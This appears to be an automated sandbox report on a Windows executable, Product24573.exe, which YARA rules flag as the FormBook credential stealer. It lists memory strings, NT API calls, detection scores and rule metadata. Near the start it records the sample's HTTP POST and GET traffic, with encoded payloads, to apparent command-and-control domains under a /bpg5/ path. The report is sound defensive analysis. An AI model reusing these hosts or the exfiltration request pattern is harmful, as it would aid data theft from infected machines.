          Source: wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1478Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 71 6a 6f 59 57 34 37 42 72 77 31 4d 45 32 6b 42 6c 4c 36 6d 44 78 30 44 74 4b 56 36 61 79 79 6e 69 44 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 5
          Source: unknownDNS traffic detected: queries for: www.berlinhealthweek.com
          Source: global trafficHTTP traffic detected: GET /bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA== HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?5eb6=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTE0i/pYvsbACINg==&ti-8=LyKdFPBKAe5W HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Product24573.exe, 00000000.00000002.399402354.00000000016A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Product24573.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 0_2_0167C0740_2_0167C074
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 0_2_0167EA480_2_0167EA48
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 0_2_0167EA580_2_0167EA58
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 0_2_0339E5A00_2_0339E5A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004058032_2_00405803
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004038832_2_00403883
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0042310A2_2_0042310A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004229EB2_2_004229EB
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004221F12_2_004221F1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_00401B602_2_00401B60
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004223DD2_2_004223DD
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004055DA2_2_004055DA
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004055E32_2_004055E3
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004225E62_2_004225E6
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004206432_2_00420643
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004226B72_2_004226B7
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_00422F712_2_00422F71
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0042170D2_2_0042170D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0042073E2_2_0042073E
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004017C02_2_004017C0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0040BFAE2_2_0040BFAE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0040BFB32_2_0040BFB3
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004017BF2_2_004017BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FF9002_2_010FF900
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011141202_2_01114120
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B10022_2_011B1002
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111A8302_2_0111A830
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011CE8242_2_011CE824
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110B0902_2_0110B090
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A02_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C20A82_2_011C20A8
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C28EC2_2_011C28EC
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111A3092_2_0111A309
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C2B282_2_011C2B28
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111AB402_2_0111AB40
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0119CB4F2_2_0119CB4F
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112138B2_2_0112138B
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112EBB02_2_0112EBB0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B03DA2_2_011B03DA
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011BDBD22_2_011BDBD2
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112ABD82_2_0112ABD8
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011A23E32_2_011A23E3
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011AFA2B2_2_011AFA2B
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C22AE2_2_011C22AE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4AEF2_2_011B4AEF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C2D072_2_011C2D07
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F0D202_2_010F0D20
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C1D552_2_011C1D55
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011225812_2_01122581
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B2D822_2_011B2D82
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C25DD2_2_011C25DD
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110D5E02_2_0110D5E0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110841F2_2_0110841F
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111B4772_2_0111B477
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011BD4662_2_011BD466
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B44962_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011CDFCE2_2_011CDFCE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C1FF12_2_011C1FF1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011BD6162_2_011BD616
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01116E302_2_01116E30
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C2EF72_2_011C2EF7
          Source: C:\Users\user\Desktop\Product24573.exeCode function: String function: 010FB150 appears 136 times
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041E563 NtCreateFile,2_2_0041E563
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041E613 NtReadFile,2_2_0041E613
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041E693 NtClose,2_2_0041E693
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041E743 NtAllocateVirtualMemory,2_2_0041E743
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041E65D NtReadFile,2_2_0041E65D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041E68F NtClose,2_2_0041E68F
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01139910
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011399A0 NtCreateSection,LdrInitializeThunk,2_2_011399A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139840 NtDelayExecution,LdrInitializeThunk,2_2_01139840
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01139860
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_011398F0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01139A00
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139A20 NtResumeThread,LdrInitializeThunk,2_2_01139A20
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139A50 NtCreateFile,LdrInitializeThunk,2_2_01139A50
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139540 NtReadFile,LdrInitializeThunk,2_2_01139540
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011395D0 NtClose,LdrInitializeThunk,2_2_011395D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139710 NtQueryInformationToken,LdrInitializeThunk,2_2_01139710
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139780 NtMapViewOfSection,LdrInitializeThunk,2_2_01139780
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_011397A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139FE0 NtCreateMutant,LdrInitializeThunk,2_2_01139FE0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01139660
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_011396E0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139950 NtQueueApcThread,2_2_01139950
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011399D0 NtCreateProcessEx,2_2_011399D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139820 NtEnumerateKey,2_2_01139820
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0113B040 NtSuspendThread,2_2_0113B040
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011398A0 NtWriteVirtualMemory,2_2_011398A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139B00 NtSetValueKey,2_2_01139B00
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0113A3B0 NtGetContextThread,2_2_0113A3B0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139A10 NtQuerySection,2_2_01139A10
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139A80 NtOpenDirectoryObject,2_2_01139A80
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0113AD30 NtSetContextThread,2_2_0113AD30
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139520 NtWaitForSingleObject,2_2_01139520
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139560 NtWriteFile,2_2_01139560
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011395F0 NtQueryInformationFile,2_2_011395F0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0113A710 NtOpenProcessToken,2_2_0113A710
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139730 NtQueryVirtualMemory,2_2_01139730
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139770 NtSetInformationFile,2_2_01139770
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0113A770 NtOpenThread,2_2_0113A770
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139760 NtOpenProcess,2_2_01139760
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139610 NtEnumerateValueKey,2_2_01139610
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139650 NtQueryValueKey,2_2_01139650
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01139670 NtQueryInformationProcess,2_2_01139670
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011396D0 NtCreateKey,2_2_011396D0
          Source: Product24573.exe, 00000000.00000002.399402354.00000000016A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Product24573.exe
          Source: Product24573.exe, 00000000.00000002.406152388.0000000007A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs Product24573.exe
          Source: Product24573.exe, 00000000.00000000.381055509.0000000000F18000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelJJaU.exe4 vs Product24573.exe
          Source: Product24573.exe, 00000002.00000003.399612512.000000000104F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product24573.exe
          Source: Product24573.exe, 00000002.00000002.440678675.0000000002CD2000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs Product24573.exe
          Source: Product24573.exe, 00000002.00000003.397760095.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product24573.exe
          Source: Product24573.exe, 00000002.00000002.438948857.00000000011EF000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product24573.exe
          Source: Product24573.exe, 00000002.00000002.438590358.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs Product24573.exe
          Source: Product24573.exeBinary or memory string: OriginalFilenamelJJaU.exe4 vs Product24573.exe
          Source: Product24573.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Product24573.exeReversingLabs: Detection: 37%
          Source: Product24573.exeVirustotal: Detection: 53%
          Source: Product24573.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Product24573.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exe
